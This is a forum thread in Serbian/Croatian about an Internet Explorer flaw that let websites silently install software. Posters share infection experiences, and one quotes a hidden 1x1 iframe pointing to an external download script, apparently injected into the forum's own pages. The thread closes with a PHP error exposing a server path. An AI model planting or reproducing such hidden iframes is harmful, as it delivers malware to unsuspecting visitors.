Jump to content

Recommended Posts

• Replies 85
  • Created
  • Last Reply

Top Posters In This Topic

Posted

Ja sam to iskusio prije dva sata i evo sve do sada su mi AV programi cistili komp,usput uleti i neka gomila spywareova.Od ovog trenutka Firefox i Search&Destroy rules,ni sam ne znam sto sam koristio IE.

Posted

Autori mogu da koriste propust u browseru koji im omogućava da instaliraju nepoželjan softver na računar.

Video sam IE "u akciji" kada smo otišli na neki security sajt. Predlože ljudi da odemo na tu i tu stranicu kako bismo proverili da li je browser koji koristimo ranjiv. Mi tamo, a ono molba da restartujemo rečunar kako bismo proverili da li je određena rupa pokrpljena. Nakon restarta pokrenula se konzolna aplikacija koju je navedena stranica instalirala na računar i podesila da se pokreće pri startovanju Windowsa bez našeg znanja. U ovom slučaju je bio mali exe koji kaže da imaš ogromnu rupu, ali je moglo biti bilo šta...

Oni koji imaju instaliran AV ne bi trebalo da brinu. Oni koji koriste IE i nemaju nikakav vid zaštite treba da razmisle o tome da se prebace na neki normalan browser ili instaliraju neki AV.

Posted
Autori mogu da koriste propust u browseru koji im omogućava da instaliraju nepoželjan softver na računar.

Znam to, ali otkud ovaj kod u zoni?:

<iframe src="http://traffbest.biz/dl/adv428.php" height="1" width="1"></iframe>

Posted

Ne ori po kodu! :lol:

Fatal error: Call to undefined function: clean_int_array() in /home/dzonah3/public_html/forums/sources/search.php on line 83